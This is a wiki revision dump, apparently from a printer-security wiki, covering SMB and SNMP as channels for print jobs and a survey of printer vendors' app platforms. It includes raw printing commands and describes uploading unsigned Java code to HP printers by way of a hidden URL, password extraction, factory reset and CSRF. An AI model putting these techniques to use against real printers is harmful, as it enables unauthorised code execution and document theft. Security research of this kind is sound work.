files. In the Windows world, printing directly (without any ‘printer drivers’ interfering and converting the file) to a shared printer can be done as follows: C:\> copy /b file \\server\share ...where <code>server</code> is either the printer itself, if it supports direct printing over SMB, or a separate computer system connected to the device and <code>share</code> is the name of the printer share. In the UNIX world, directly sending a file to an SMB printer share can be achived with the ''smbclient'' or the ''smbspool'' command from the samba(7) suite: smbclient [-N|-U user] //server/share -c "print file" smbspool smb://[user:pass]@server/share 0 user title 1 "" file → ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]] ---- 9f65b1ea2e998a027d3620f131ee06a677c20213 264 258 2017-01-28T14:47:39Z Admin 1 wikitext text/x-wiki [[File:SMB-deployment-channel.png|thumb|180px|Printing over SMB]] Server Message Block (SMB) is an application-layer network protocol for file and printer sharing originally developed by IBM in the mid-80s. It is the default method used by Windows based computers to share files and printers <ref>''[https://technet.microsoft.com/en-us/library/cc939973.aspx Common Internet File System]'', Microsoft TechNet Library</ref>. A free implementation is available with the [https://en.wikipedia.org/wiki/Samba_%28software%29 Samba] project. Some network printers bring their own SMB server – usually running on port 445/tcp – which, just like to [[LPD]], [[IPP]] and [[raw]] port 9100 printing, can be abused as a carrier for malicious PostScript or PJL files. In the Windows world, printing directly (without any ‘printer drivers’ interfering and converting the file) to a shared printer can be done as follows: C:\> copy /b file \\server\share ...where <code>server</code> is either the printer itself, if it supports direct printing over SMB, or a separate computer system connected to the device and <code>share</code> is the name of the printer share. In the UNIX world, directly sending a file to an SMB printer share can be achived with the ''smbclient'' or the ''smbspool'' command from the samba(7) suite: smbclient [-N|-U user] //server/share -c "print file" smbspool smb://[user:pass]@server/share 0 user title 1 "" file → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]] ---- db1bfa27dc8ffe14cce950e6567b2cf878816032 258 244 2017-01-28T14:44:02Z Admin 1 wikitext text/x-wiki [[File:SMB-deployment-channel.png|thumb|190px|SMB print job deployment]] Server Message Block (SMB) is an application-layer network protocol for file and printer sharing originally developed by IBM in the mid-80s. It is the default method used by Windows based computers to share files and printers <ref>''[https://technet.microsoft.com/en-us/library/cc939973.aspx Common Internet File System]'', Microsoft TechNet Library</ref>. A free implementation is available with the [https://en.wikipedia.org/wiki/Samba_%28software%29 Samba] project. Some network printers bring their own SMB server – usually running on port 445/tcp – which, just like to [[LPD]], [[IPP]] and [[raw]] port 9100 printing, can be abused as a carrier for malicious PostScript or PJL files. In the Windows world, printing directly (without any ‘printer drivers’ interfering and converting the file) to a shared printer can be done as follows: C:\> copy /b file \\server\share ...where <code>server</code> is either the printer itself, if it supports direct printing over SMB, or a separate computer system connected to the device and <code>share</code> is the name of the printer share. In the UNIX world, directly sending a file to an SMB printer share can be achived with the ''smbclient'' or the ''smbspool'' command from the samba(7) suite: smbclient [-N|-U user] //server/share -c "print file" smbspool smb://[user:pass]@server/share 0 user title 1 "" file → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]] ---- 2c90a50d0202ed0d1ccb635defaa237781bab0c0 244 234 2017-01-28T14:16:11Z Admin 1 wikitext text/x-wiki [[File:SMB-deployment-channel.png|thumb|Deployment of (malicious) print jobs via SMB]] Server Message Block (SMB) is an application-layer network protocol for file and printer sharing originally developed by IBM in the mid-80s. It is the default method used by Windows based computers to share files and printers <ref>''[https://technet.microsoft.com/en-us/library/cc939973.aspx Common Internet File System]'', Microsoft TechNet Library</ref>. A free implementation is available with the [https://en.wikipedia.org/wiki/Samba_%28software%29 Samba] project. Some network printers bring their own SMB server – usually running on port 445/tcp – which, just like to [[LPD]], [[IPP]] and [[raw]] port 9100 printing, can be abused as a carrier for malicious PostScript or PJL files. In the Windows world, printing directly (without any ‘printer drivers’ interfering and converting the file) to a shared printer can be done as follows: C:\> copy /b file \\server\share ...where <code>server</code> is either the printer itself, if it supports direct printing over SMB, or a separate computer system connected to the device and <code>share</code> is the name of the printer share. In the UNIX world, directly sending a file to an SMB printer share can be achived with the ''smbclient'' or the ''smbspool'' command from the samba(7) suite: smbclient [-N|-U user] //server/share -c "print file" smbspool smb://[user:pass]@server/share 0 user title 1 "" file → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]] ---- 50be846285b7ca684858a3f47cd87a0346f3d706 234 233 2017-01-28T12:49:06Z Admin 1 wikitext text/x-wiki Server Message Block (SMB) is an application-layer network protocol for file and printer sharing originally developed by IBM in the mid-80s. It is the default method used by Windows based computers to share files and printers <ref>''[https://technet.microsoft.com/en-us/library/cc939973.aspx Common Internet File System]'', Microsoft TechNet Library</ref>. A free implementation is available with the [https://en.wikipedia.org/wiki/Samba_%28software%29 Samba] project. Some network printers bring their own SMB server – usually running on port 445/tcp – which, just like to [[LPD]], [[IPP]] and [[raw]] port 9100 printing, can be abused as a carrier for malicious PostScript or PJL files. In the Windows world, printing directly (without any ‘printer drivers’ interfering and converting the file) to a shared printer can be done as follows: C:\> copy /b file \\server\share ...where <code>server</code> is either the printer itself, if it supports direct printing over SMB, or a separate computer system connected to the device and <code>share</code> is the name of the printer share. In the UNIX world, directly sending a file to an SMB printer share can be achived with the ''smbclient'' or the ''smbspool'' command from the samba(7) suite: smbclient [-N|-U user] //server/share -c "print file" smbspool smb://[user:pass]@server/share 0 user title 1 "" file → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]] ---- 7040ffc373fe972820fc5177e9441fbc77635c81 233 81 2017-01-28T10:24:43Z 77.181.223.192 0 wikitext text/x-wiki In the Windows world, you can print directly (without any ‘printer drivers’ interfering and converting the file) on a shared printer as follows: C:\> copy /b file \\server\printer ...where <code>server</code> can be the printer itself, if it supports direct printing over SMB or a separate computer system and <code>printer</code> is the name of the printer share. In the UNIX world, you can directly send a file to a printer using either the ''smbclient'' or the ''smbspool'' command from the samba(7) suite: smbclient [-N|-U user] //server/printer -c "print file" smbspool smb://[user:pass]@server/printer 0 user title 1 "" file ... → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]] ---- d99abee187d2a4373e51da739422393d88d5d038 81 2017-01-09T09:49:30Z Admin 1 Created page with " → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]] ----" wikitext text/x-wiki → ''Related aricles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]] ---- 5b8d2bab7329854769c71d2eaa6e85454581414d 0 21 629 331 2017-06-25T11:25:36Z Admin 1 wikitext text/x-wiki The Simple Network Management Protocol (SNMP) is a port 161/udp protocol, designed to manage various network components like routers. The architecture is defined in RFC3411 <ref>''[https://www.ietf.org/rfc/rfc3411.txt RFC3411: An Architecture for Describing Simple Network Management Protocol (SNMP) Management Frameworks]'', D. Harrington, R. Presuhn and B. Wijnen, 2000</ref>. Information offered by a managed system is not subject to the standard itself but defined in separate hierarchical database files, so called MIBs (management information bases). A MIB consists of various OID (object identifier) entries, each one identifying a variable to be either monitored (SNMP GetRequest) or modified (SNMP SetRequest). An example of retrieving the <code>hrDeviceDescr</code> value (OID 1.3.6.1.2.1.25.3.2.1.3, textual description of a device) from the ‘Host Resources MIB’ as defined in RFC1514 <ref>''[https://www.ietf.org/rfc/rfc1514.txt RFC1514: Host Resources MIB]'', P. Grillo and S. Waldbusser, 1993</ref> is shown below: <syntaxhighlight lang=sh> snmpget -v1 -c public printer iso.3.6.1.2.1.25.3.2.1.3.1 iso.3.6.1.2.1.25.3.2.1.3.1 = STRING: "hp LaserJet 4250" </syntaxhighlight> While SNMP is not printer-specific, many printer manufacturers have published MIBs for their network printer model, often including security-sensitive functionality. A generic approach to create a vendor-independent ‘Printer MIB’ was taken in RFC3805 <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref>. SNMP broadcast is used in printing software like [https://en.wikipedia.org/wiki/CUPS CUPS] or [[PRET]] to quickly discover network printers in the local subnet and enumerate their capabilities. As a stand-alone language, SNMP can only be exploited if the attacker has access to port 161/udp of the printer device and the community string is known (usually set to <code>public</code> by default). On HP devices however, SNMP can be embedded within [[PJL]] and therefore included into arbitrary print jobs as so called [[PML]] commands. → ''Related articles:'' [[PML]] ----------- 8b38127a290330d42824c9403138249eb89e7bbb 331 309 2017-01-31T15:49:03Z Admin 1 wikitext text/x-wiki The Simple Network Management Protocol (SNMP) is a port 161/udp protocol, designed to manage various network components like routers. The architecture is defined in RFC3411 <ref>''[https://www.ietf.org/rfc/rfc3411.txt RFC3411: An Architecture for Describing Simple Network Management Protocol (SNMP) Management Frameworks]'', D. Harrington, R. Presuhn and B. Wijnen, 2000</ref>. Information offered by a managed system is not subject to the standard itself but defined in separate hierarchical database files, so called MIBs (management information bases). A MIB consists of various OID (object identifier) entries, each one identifying a variable to be either monitored (SNMP GetRequest) or modified (SNMP SetRequest). An example of retrieving the <code>hrDeviceDescr</code> value (OID 1.3.6.1.2.1.25.3.2.1.3, textual description of a device) from the ‘Host Resources MIB’ as defined in RFC1514 <ref>''[https://www.ietf.org/rfc/rfc1514.txt RFC1514: Host Resources MIB]'', P. Grillo and S. Waldbusser, 1993</ref> is shown below: <syntaxhighlight lang=sh> snmpget -v1 -c public printer iso.3.6.1.2.1.25.3.2.1.3.1 iso.3.6.1.2.1.25.3.2.1.3.1 = STRING: "hp LaserJet 4250" </syntaxhighlight> While SNMP is not printer-specific, many printer manufacturers have published MIBs for their network printer model, often including security-sensitive functionality. A generic approach to create a vendor-independent ‘Printer MIB’ was taken in RFC3805 <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref>. SNMP broadcast is used in printing software like [[CUPS]] or [[PRET]] to quickly discover network printers in the local subnet and enumerate their capabilities. As a stand-alone language, SNMP can only be exploited if the attacker has access to port 161/udp of the printer device and the community string is known (usually set to <code>public</code> by default). On HP devices however, SNMP can be embedded within [[PJL]] and therefore included into arbitrary print jobs as so called [[PML]] commands. → ''Related articles:'' [[PML]] ----------- 21bdd51de63c3a1efb1488a6256b4f590ee13f6d 309 308 2017-01-31T08:21:51Z 84.153.135.37 0 wikitext text/x-wiki The Simple Network Management Protocol (SNMP) is a port 161/udp protocol, designed to manage various network components like routers. The architecture is defined in RFC3411 <ref>''[https://www.ietf.org/rfc/rfc3411.txt RFC3411: An Architecture for Describing Simple Network Management Protocol (SNMP) Management Frameworks]'', D. Harrington, R. Presuhn and B. Wijnen, 2000</ref>. Information offered by a managed system is not subject to the standard itself but defined in separate hierarchical database files, so called MIBs (management information bases). A MIB consists of various OID (object identifier) entries, each one identifying a variable to be either monitored (SNMP GetRequest) or modified (SNMP SetRequest). An example of retrieving the <code>hrDeviceDescr</code> value (OID 1.3.6.1.2.1.25.3.2.1.3, textual description of a device) from the `Host Resources MIB' as defined in RFC1514 <ref>''[https://www.ietf.org/rfc/rfc1514.txt RFC1514: Host Resources MIB]'', P. Grillo and S. Waldbusser, 1993</ref> is shown below: <syntaxhighlight lang=sh> snmpget -v1 -c public printer iso.3.6.1.2.1.25.3.2.1.3.1 iso.3.6.1.2.1.25.3.2.1.3.1 = STRING: "hp LaserJet 4250" </syntaxhighlight> While SNMP is not printer-specific, many printer manufacturers have published MIBs for their network printer model, often including security-sensitive functionality. A generic approach to create a vendor-independent `Printer MIB' was taken in RFC3805 <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref>. SNMP broadcast is used in printing software like [[CUPS]] or [[PRET]] to quickly discover network printers in the local subnet and enumerate their capabilities. As a stand-alone language, SNMP can only be exploited if the attacker has access to port 161/udp of the printer device and the community string is known (usually set to <code>public</code> by default). On HP devices however, SNMP can be embedded within [[PJL]] and therefore included into arbitrary print jobs as so called [[PML]] commands. → ''Related articles:'' [[PML]] ----------- 59e395157445cb12179ecd5df35fc2282427124f 308 177 2017-01-31T08:20:33Z 84.153.135.37 0 wikitext text/x-wiki The Simple Network Management Protocol (SNMP) is a port 161/udp protocol, designed to manage various network components like routers. The architecture is defined in RFC3411 <ref>''[https://www.ietf.org/rfc/rfc3411.txt RFC3411: An Architecture for Describing Simple Network Management Protocol (SNMP) Management Frameworks]'', D. Harrington, R. Presuhn and B. Wijnen, 2000</ref>. Information offered by a managed system is not subject to the standard itself but defined in separate hierarchical database files, so called MIBs (management information bases). An MIB consists of various OID (object identifier) entries, each one identifying a variable to be either monitored (SNMP GetRequest) or modified (SNMP SetRequest). An example of retrieving the <code>hrDeviceDescr</code> value (OID 1.3.6.1.2.1.25.3.2.1.3, textual description of a device) from the `Host Resources MIB' as defined in RFC1514 <ref>''[https://www.ietf.org/rfc/rfc1514.txt RFC1514: Host Resources MIB]'', P. Grillo and S. Waldbusser, 1993</ref> is shown below: <syntaxhighlight lang=sh> snmpget -v1 -c public printer iso.3.6.1.2.1.25.3.2.1.3.1 iso.3.6.1.2.1.25.3.2.1.3.1 = STRING: "hp LaserJet 4250" </syntaxhighlight> While SNMP is not printer-specific, many printer manufacturers have published MIBs for their network printer model, often including security-sensitive functionality. A generic approach to create a vendor-independent `Printer MIB' was taken in RFC3805 <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref>. SNMP broadcast is used in printing software like [[CUPS]] or [[PRET]] to quickly discover network printers in the local subnet and enumerate their capabilities. As a stand-alone language, SNMP can only be exploited if the attacker has access to port 161/udp of the printer device and the community string is known (usually set to <code>public</code> by default). On HP devices however, SNMP can be embedded within [[PJL]] and therefore included into arbitrary print jobs as so called [[PML]] commands. → ''Related articles:'' [[PML]] ----------- 9fabb75d7c0e42c5ea180ee762c859244f3c272c 177 128 2017-01-21T11:45:49Z Admin 1 wikitext text/x-wiki The Simple Network Management Protocol (SNMP) is a port 161/udp protocol, designed to manage various network components like routers. The architecture is defined in RFC3411 <ref>''[https://www.ietf.org/rfc/rfc3411.txt RFC3411: An Architecture for Describing Simple Network Management Protocol (SNMP) Management Frameworks]'', D. Harrington, R. Presuhn and B. Wijnen, 2000</ref>. Information offered by a managed system is not subject to the standard itself but defined in separate hierarchical database files, so called MIBs (management information bases). An MIB consists of various OID (object identifier) entries, each one identifying a variable to be either monitored (SNMP GetRequest) or modified (SNMP SetRequest). An example of retrieving the <code>hrDeviceDescr</code> value (OID 1.3.6.1.2.1.25.3.2.1.3, textual description of a device) from the `Host Resources MIB' as defined in RFC1514 <ref>''[https://www.ietf.org/rfc/rfc1514.txt RFC1514: Host Resources MIB]'', P. Grillo and S. Waldbusser, 1993</ref> is shown below: <syntaxhighlight lang=sh> snmpget -v1 -c public printer iso.3.6.1.2.1.25.3.2.1.3.1 iso.3.6.1.2.1.25.3.2.1.3.1 = STRING: "hp LaserJet 4250" </syntaxhighlight> While SNMP is not printer-specific, many printer manufacturers have published MIBs for their network printer model, often including security-sensitive functionality. A generic approach to create a vendor-independent `Printer MIB' was taken in RFC3805 <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref>. SNMP broadcast is used in printing software like [[CUPS]] or [[PRET]] to quickly discover network printers in the local subnet and enumerate their capabilities. As a stand-alone language, SNMP can only be exploited if the attacker has access to port 161/udp of the printer device and the community string is known (usually set to <code>public</code> by default). On HP devices however, SNMP can be embedded within [[PJL]] and therefore included into arbitrary print jobs as so called [[PML]] commands. → ''Related aricles:'' [[PML]] ----------- 04fd1d62bebb9fd2d82611bd9613ba2bea12f32c 128 68 2017-01-14T19:58:22Z Admin 1 wikitext text/x-wiki The Simple Network Management Protocol (SNMP) is a port 161/udp protocol, designed to manage various network components like routers. The architecture is defined in RFC3411 <ref>''[https://www.ietf.org/rfc/rfc3411.txt RFC3411: An Architecture for Describing Simple Network Management Protocol (SNMP) Management Frameworks]'', D. Harrington, R. Presuhn and B. Wijnen, 2000</ref>. Information offered by a managed system is not subject to the standard itself but defined in separate hierarchical database files, so called MIBs (management information bases). An MIB consists of various OID (object identifier) entries, each one identifying a variable to be either monitored (SNMP GetRequest) or modified (SNMP SetRequest). An example of retrieving the <code>hrDeviceDescr</code> value (OID 1.3.6.1.2.1.25.3.2.1.3, textual description of a device) from the `Host Resources MIB' as defined in RFC1514 <ref>''[https://www.ietf.org/rfc/rfc1514.txt RFC1514: Host Resources MIB]'', P. Grillo and S. Waldbusser, 1993</ref> is shown below: $ snmpget -v1 -c public printer iso.3.6.1.2.1.25.3.2.1.3.1 iso.3.6.1.2.1.25.3.2.1.3.1 = STRING: "hp LaserJet 4250" While SNMP is not printer-specific, many printer manufacturers have published MIBs for their network printer model, often including security-sensitive functionality. A generic approach to create a vendor-independent `Printer MIB' was taken in RFC3805 <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref>. SNMP broadcast is used in printing software like [[CUPS]] or [[PRET]] to quickly discover network printers in the local subnet and enumerate their capabilities. As a stand-alone language, SNMP can only be exploited if the attacker has access to port 161/udp of the printer device and the community string is known (usually set to <code>public</code> by default). On HP devices however, SNMP can be embedded within [[PJL]] and therefore included into arbitrary print jobs as so called [[PML]] commands. → ''Related aricles:'' [[PML]] ----------- e1e341a3d5578f59716c040263e5e67c8f9563f8 68 67 2017-01-08T16:04:24Z Admin 1 wikitext text/x-wiki The Simple Network Management Protocol (SNMP) is a port 161/udp protocol, designed to manage various network components like routers. The architecture is defined in RFC3411 <ref>''[https://www.ietf.org/rfc/rfc3411.txt RFC3411: An Architecture for Describing Simple Network Management Protocol (SNMP) Management Frameworks]'', D. Harrington, R. Presuhn and B. Wijnen, 2000</ref>. Information offered by a managed system is not subject to the standard itself but defined in separate hierarchical database files, so called MIBs (management information bases). An MIB consists of various OID (object identifier) entries, each one identifying a variable to be either monitored (SNMP GetRequest) or modified (SNMP SetRequest). An example of retrieving the <code>hrDeviceDescr</code> value (OID 1.3.6.1.2.1.25.3.2.1.3, textual description of a device) from the `Host Resources MIB' as defined in RFC1514 <ref>''[https://www.ietf.org/rfc/rfc1514.txt RFC1514: Host Resources MIB]'', P. Grillo and S. Waldbusser, 1993</ref> is shown below: $ snmpget -v1 -c public printer iso.3.6.1.2.1.25.3.2.1.3.1 iso.3.6.1.2.1.25.3.2.1.3.1 = STRING: "hp LaserJet 4250" While SNMP is not printer-specific, many printer manufacturers have published MIBs for their network printer model, often including security-sensitive functionality. A generic approach to create a vendor-independent `Printer MIB' was taken in RFC3805 <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref>. SNMP broadcast is used in printing software like [[CUPS]] or [[PRET]] to quickly discover network printers in the local subnet and enumerate their capabilities. As a stand-alone language, SNMP can only be exploited if the attacker has access to port 161/udp of the printer device and the community string is known (usually set to <code>public</code> by default). On HP devices however, SNMP can be embedded within [[PJL]] and therefore included into arbitrary print jobs as so called [[PML]] commands. → ''Related aricles:'' [[PML]] ----------- e776a7e87f24ac612a12d30205d3370d0deeb7de 67 66 2017-01-08T16:04:00Z Admin 1 wikitext text/x-wiki SNMP (Simple Network Management Protocol) is a port 161/udp protocol, designed to manage various network components like routers. The architecture is defined in RFC3411 <ref>''[https://www.ietf.org/rfc/rfc3411.txt RFC3411: An Architecture for Describing Simple Network Management Protocol (SNMP) Management Frameworks]'', D. Harrington, R. Presuhn and B. Wijnen, 2000</ref>. Information offered by a managed system is not subject to the standard itself but defined in separate hierarchical database files, so called MIBs (management information bases). An MIB consists of various OID (object identifier) entries, each one identifying a variable to be either monitored (SNMP GetRequest) or modified (SNMP SetRequest). An example of retrieving the <code>hrDeviceDescr</code> value (OID 1.3.6.1.2.1.25.3.2.1.3, textual description of a device) from the `Host Resources MIB' as defined in RFC1514 <ref>''[https://www.ietf.org/rfc/rfc1514.txt RFC1514: Host Resources MIB]'', P. Grillo and S. Waldbusser, 1993</ref> is shown below: $ snmpget -v1 -c public printer iso.3.6.1.2.1.25.3.2.1.3.1 iso.3.6.1.2.1.25.3.2.1.3.1 = STRING: "hp LaserJet 4250" While SNMP is not printer-specific, many printer manufacturers have published MIBs for their network printer model, often including security-sensitive functionality. A generic approach to create a vendor-independent `Printer MIB' was taken in RFC3805 <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref>. SNMP broadcast is used in printing software like [[CUPS]] or [[PRET]] to quickly discover network printers in the local subnet and enumerate their capabilities. As a stand-alone language, SNMP can only be exploited if the attacker has access to port 161/udp of the printer device and the community string is known (usually set to <code>public</code> by default). On HP devices however, SNMP can be embedded within [[PJL]] and therefore included into arbitrary print jobs as so called [[PML]] commands. → ''Related aricles:'' [[PML]] ----------- 773287f92eda6647068da2c49712b0bcba1ad355 66 2017-01-08T16:03:04Z Admin 1 Created page with "== SNMP == SNMP (Simple Network Management Protocol) is a port 161/udp protocol, designed to manage various network components like routers. The architecture is defined in RF..." wikitext text/x-wiki == SNMP == SNMP (Simple Network Management Protocol) is a port 161/udp protocol, designed to manage various network components like routers. The architecture is defined in RFC3411 <ref>''[https://www.ietf.org/rfc/rfc3411.txt RFC3411: An Architecture for Describing Simple Network Management Protocol (SNMP) Management Frameworks]'', D. Harrington, R. Presuhn and B. Wijnen, 2000</ref>. Information offered by a managed system is not subject to the standard itself but defined in separate hierarchical database files, so called MIBs (management information bases). An MIB consists of various OID (object identifier) entries, each one identifying a variable to be either monitored (SNMP GetRequest) or modified (SNMP SetRequest). An example of retrieving the <code>hrDeviceDescr</code> value (OID 1.3.6.1.2.1.25.3.2.1.3, textual description of a device) from the `Host Resources MIB' as defined in RFC1514 <ref>''[https://www.ietf.org/rfc/rfc1514.txt RFC1514: Host Resources MIB]'', P. Grillo and S. Waldbusser, 1993</ref> is shown below: $ snmpget -v1 -c public printer iso.3.6.1.2.1.25.3.2.1.3.1 iso.3.6.1.2.1.25.3.2.1.3.1 = STRING: "hp LaserJet 4250" While SNMP is not printer-specific, many printer manufacturers have published MIBs for their network printer model, often including security-sensitive functionality. A generic approach to create a vendor-independent `Printer MIB' was taken in RFC3805 <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref>. SNMP broadcast is used in printing software like [[CUPS]] or [[PRET]] to quickly discover network printers in the local subnet and enumerate their capabilities. As a stand-alone language, SNMP can only be exploited if the attacker has access to port 161/udp of the printer device and the community string is known (usually set to <code>public</code> by default). On HP devices however, SNMP can be embedded within [[PJL]] and therefore included into arbitrary print jobs as so called [[PML]] commands. → ''Related aricles:'' [[PML]] ----------- 47da53da2689460ad04cd7453ea2482fbfc3dccc 0 43 322 282 2017-01-31T10:12:56Z 84.153.135.135 0 wikitext text/x-wiki In the recent years, printer vendors have started to introduce the '''possibility to install custom software on their devices'''. The format of such ‘printer apps’ is proprietary and SDKs are not available to the public. The feature of writing customized software which runs on printers was intended and is reserved for resellers and contractors, not for end-users. Hereby a printer fleet can be adapted to the special needs and business processes of a company; document solution providers can easily integrate printers into their management software. One popular example is ''NSi AutoStore'' <ref>''[http://www.notablesolutions.com/products/nsi-autostore/ NSi AutoStore]'', Nuance Communications, Inc.</ref> which can be installed on many MFPs and automatically uploads scanned or copied documents to predefined locations. Obviously, the feature to run custom code on a printer device is a potential security threat. Furthermore code signing of software packages is potentially harder than it is for [[Firmware updates|firmware]] as software is not only written by the printer manufacturer but by a broader range of developers who need to be in possession of the secret key to sign their software. Therefore it is logical to include the secret key in SDKs which are protected by being exclusively available from developer platforms. This article is an effort to systematically gather information on vendor-specific software platforms/SDKs. == Vendors == In the following a rough outline on the software platforms provided by major printer vendors to extend functionality of their devices is given. === HP (Chai/OXP) === HP introduced their ‘Chai Appliance Platform’ platform in 1999 to run Java applications on LaserJet printers. While an SDK had been open to the public at first <ref>''[https://www.heise.de/newsticker/meldung/Java-API-fuer-HP-Drucker-54026.html Java API für HP-Drucker]'', heise online, 2001</ref>, access was later restricted to members of HP's developer network. Chai servlets which come as <code>.jar</code> files which originally needed to be certified and signed by HP before they would be accepted by a printer device. <ref name="phenoelit2002embedded">''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> discovered a flaw in the deployment process: by installing ''EZloader'' – an alternative loader software provided by HP which had already been signed – they were able to upload and run their own, unsigned Java packages. As it seems, code signing was completely dropped by HP for later Chai versions: <ref name="mueller2016printers">''Exploiting Network Printers'', J. Müller, 2016, p. 59</ref> were able to write and execute a proof-of-concept printer malware which listens on port 9100 and uploads incoming documents to an FTP server before printing them. Their code is based on <ref>''Distribuição Balanceada de Jobs em uma Rede de Impressoras'', L. Waechter, 2005</ref> who extended the device to support load-balancing and included the required SDK files and proprietary Java libraries in their demonstration. With the libraries, arbitrary Java code can be complied and executed on older HP LaserJets by uploading the <code>.jar</code> files to a ‘hidden’ URL: <code>http://printer/hp/device/this.loader</code>. This attack can be carried out if no password has yet been set for the embedded web server. Otherwise, the password must first be retrieved from <code>/dev/rdsk_jdi_cfg0</code> with PostScript (see [[file system access]]) or bypassed by resetting the device to [[factory defaults]]. A web attacker can upload the <code>.jar</code> file using [https://en.wikipedia.org/wiki/Cross-site_request_forgery CSRF] if the victim is currently logged into the printer's embedded web server. For newer devices, HP uses the web services based ‘Open Extensibility Platform’ ([https://developers.hp.com/oxp/ OXP]) instead of Chai for which no SDK is publicly available. === Canon (MEAP) === The ‘Multifunctional Embedded Application Platform’ ([http://www.developersupport.canon.com/faq/335#t335n18 MEAP]) is a Java-based software platform introduced by Canon in 2003 for their imageRunner series and extended to web services in 2010. Third party developers can obtain the MEAP [http://developersupport.canon.com/content/meap-sdk-0 SDK] for a fee of ''$5,000'' which is certainly out of scope for research purposes. === Xerox/Dell (EIP) === The ‘Extensible Interface Platform’ ([http://www.office.xerox.com/eip/enus.html EIP]) <ref>''[http://www.it-executive.nl/images/downloads/Extensible%20Interface.pdf From Peripheral To Platform: MFP Software Development Tools and Xerox's Extensible Interface Platform]'', B. Bissett, 2016</ref> was announced in 2006 by Xerox for various MFPs. The architecture – which is also supported by a few rebadged Dell devices – is based on web services technology. The [http://www.office.xerox.com/eip/enus.html SDK] is freely available for registered developers. === Brother (BSI) === The ‘Brother Solutions Interface’ ([https://www.brother-usa.com/lp/civ/bsi.aspx BSI]) is an XML-based web architecture launched in 2012 for scanners, copiers and printers. Access to the [https://www.brother-usa.com/lp/civ/home.aspx SDK] is available to licensed developers. === Lexmark (eSF) === The ‘Embedded Solution Framework’ ([http://www.lexmark-emea.com/usa/BSD_solution_catalouge.pdf eSF]) was launched in 2006 for Lexmark MFPs. The SDK to develop Java applications is reserved for ‘specially qualified partners’. According to <ref>''[http://media.lexmark.com/www/doc/en_US/Security_White_Paper_Final_Q12014.pdf Security Features of Lexmark Multi-Function and Single Function Printers]'', Lexmark International, 2013, p. 6</ref> ‘these applications must be digitally signed by Lexmark before being adopted’ using 2048-bit RSA signatures. === Samsung (XOA) === The ‘eXtensible Open Architecture’ ([http://samsungprintingsolutions.com/2015/02/can-samsungs-extensible-open-architecture-xoa/ XOA]) was introduced by Samsung in 2008 and comes in two flavours: the XOA-E Java virtual machine and the web services based XOA-Web. The [http://xoapartnerportal.com/ SDK] is only available to Samsung resellers. === Ricoh (ESA) === The ‘Embedded Software Architecture’ ([https://www.ricoh.com/esa/ ESA]) <ref>''[http://ricoh.com/esa/pdf/white_letter.pdf White Paper: Embedded Software Architecture SDK]'', Ricoh Company, Ltd., 2014</ref> was launched by Ricoh in 2004. The Java based [http://www.ricoh-developer.com/content/device-sdk-type-j-sdkj-overview SDK/J] is available to developers after a registration. === Kyocera/Utax (HyPAS) === The ‘Hybrid Platform for Advanced Solutions’ ([http://usa.kyoceradocumentsolutions.com/americas/jsp/Kyocera/hypas_overview.jsp HyPAS]) <ref>''[http://www.officeproductnews.net/sites/default/files/imce/KyoceraWhitepaper_0.pdf Kyocera's HyPAS Technology – A Whitepaper]'', Kyocera Corp., 2013</ref> has been released by Kyocera in 2008. Applications are based either on Java or on web services. The [https://www.kyoceradocumentsolutions.eu/index/document_solutions/HyPAS/hypas_developer_partner.html SDK] is only available for members of the ‘HyPAS Development Partner Programme’ and applications have to be approved by Kyocera. === Konica Minolta (bEST) === The ‘bizhub Extended Solution Technology’ ([https://best.kmbs.us/ bEST]) <ref>''[http://www.biz.konicaminolta.com/technologies/best/pdf/bEST_Whitepaper.pdf Konica Minolta's bizhub Extended Solution Technology (bEST) Software Development Platform for MFPs]'', B. Bissett, 2009</ref> which is based on web services was introduced by Konica Minolta in 2009. Access to the [https://best.kmbs.us/pages/levels.php SDK] requires ‘platinum membership level’ in the developer program for a fee of ''$4,000'' which is out of scope for independent researchers. === Toshiba (e-BRIDGE) === The ‘e-BRIDGE Open Platform’ ([http://www.estudio.com.sg/solutions_ebridge.aspx e-BRIDGE]) was released by Toshiba in 2008 to customize their high-end MFPs based on web services technology. An SDK is not available to the general public. === Sharp (OSA) === The ‘Open Systems Architecture’ ([http://siica.sharpusa.com/Document-Systems/Sharp-OSA OSA]) <ref>''[http://www.kelo-kopiertechnik.de/uploads/prospekte/loesungen/Prospekt OSA.pdf Sharp OSA – Informationen für Sharp Fachhändler]'', Sharp K.K., 2009</ref> was announced by Sharp in 2004. The [http://sharp-partners.com/us/PartnerPrograms/DeveloperProgram/tabid/722/Default.aspx SDK] used to develop web services is fee-based and applications need to be validated by Sharp before they can be installed on an MFP. === Oki (sXP) === The ‘smart eXtendable Platform’ ([http://www.oki.com/en/press/2014/09/z14053e.html sXP]) 